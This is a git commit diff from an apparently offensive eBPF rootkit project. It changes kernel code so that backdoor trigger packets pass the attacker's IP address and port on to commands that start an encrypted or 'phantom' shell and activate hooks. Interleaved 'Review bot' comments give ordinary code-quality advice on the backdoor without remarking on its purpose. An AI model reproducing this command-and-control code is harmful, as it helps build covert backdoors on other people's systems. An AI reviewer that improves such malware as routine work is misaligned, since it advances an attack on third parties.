Fixed phantom shell, added ips for all types of backdoor triggers so that we can use different interfaces

This commit is contained in:
h3xduck
2022-05-15 16:45:47 -04:00
parent e6cbe7c24a
commit ce3b267d01
10 changed files with 3442 additions and 3434 deletions


@@ -49,7 +49,7 @@ static __always_inline int ring_buffer_send(struct ring_buffer *rb, int pid, eve
*
* @return 0 if ok, -1 if error
*/
static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code){
static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code, __u32 ip, __u16 port){
struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
if(!event){
return -1;
@@ -58,6 +58,8 @@ static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer
event->code = code;
event->event_type = COMMAND;
event->pid = pid;
event->client_ip = ip;
event->client_port = port;
bpf_ringbuf_submit(event, 0);
return 0;
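Review bot: The doc comment above the signature still documents only the return value, while the new parameters `ip` and `port` are stored unchanged into `event->client_ip` / `event->client_port`, so a userspace reader has no way to know whether they must be passed through `ntohl`/`ntohs`. Add `@param` lines such as `@param ip   client IPv4 address, stored as received (TODO confirm: network byte order)` and `@param port client port, stored as received (TODO confirm: network byte order)` next to the existing `@return`. The head of the doc comment and the closing brace of ring_buffer_send_backdoor_command lie outside the hunk.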


@@ -15,15 +15,15 @@ static __always_inline int execute_key_command(int command_received, __u32 ip, _
switch(command_received){
case CC_PROT_COMMAND_ENCRYPTED_SHELL:
bpf_printk("Received request to start encrypted connection\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
break;
case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
bpf_printk("Received request to activate all hooks\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
break;
case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
bpf_printk("Received request to deactivate all hooks\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
break;
case CC_PROT_COMMAND_PHANTOM_SHELL:
bpf_printk("Received request to start phantom shell\n");
@@ -301,8 +301,14 @@ backdoor_finish_v3_32:
bpf_printk("FAIL CHECK 3\n");
return 0;
}
__u32 ip;
__u16 port;
__builtin_memcpy(&ip, payload+0x01, sizeof(__u32));
__builtin_memcpy(&port, payload+0x05, sizeof(__u16));
bpf_printk("Completed backdoor trigger v3 (32bit), b_data position: %i\n", b_data.last_packet_modified);
execute_key_command(command_received, 0, 0, NULL, 0);
execute_key_command(command_received, ip, port, NULL, 0);
return 1;
}
@@ -446,8 +452,14 @@ backdoor_finish_v3_16:
bpf_printk("FAIL CHECK 3\n");
return 0;
}
__u32 ip;
__u16 port;
__builtin_memcpy(&ip, payload+0x01, sizeof(__u32));
__builtin_memcpy(&port, payload+0x05, sizeof(__u16));
bpf_printk("Completed backdoor trigger v3 (16bit), b_data position: %i\n", b_data.last_packet_modified);
execute_key_command(command_received, 0, 0, NULL, 0);
execute_key_command(command_received, ip, port, NULL, 0);
return 1;
}
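Review bot: The 32-bit and 16-bit trigger paths decode the client endpoint with identical duplicated code built on unexplained offsets `payload+0x01` and `payload+0x05`; name the layout once (`#define CC_PAYLOAD_IP_OFF 0x01` and `#define CC_PAYLOAD_PORT_OFF 0x05`) or move the two `__builtin_memcpy` calls into one small `static __always_inline` helper so the two triggers cannot drift apart. The copies read 7 bytes from `payload` unconditionally; if `payload` points into packet data rather than a stack copy, the BPF verifier requires an explicit `payload + 7 <= data_end` bound — presumably the preceding "CHECK 3" guarantees it, but the hunk does not show that, so a one-line comment stating the minimum payload length relied on here would help. Because the address and port are copied raw from the attacker-supplied trigger payload, they arrive in whatever byte order the sender used and are never validated; note that on the `ip`/`port` locals so the ring-buffer consumer knows whether to convert. Both trigger functions begin before their hunks, and the `CC_PROT_COMMAND_PHANTOM_SHELL` case is cut off by the first hunk, so whether it also forwards `ip`/`port` cannot be checked here.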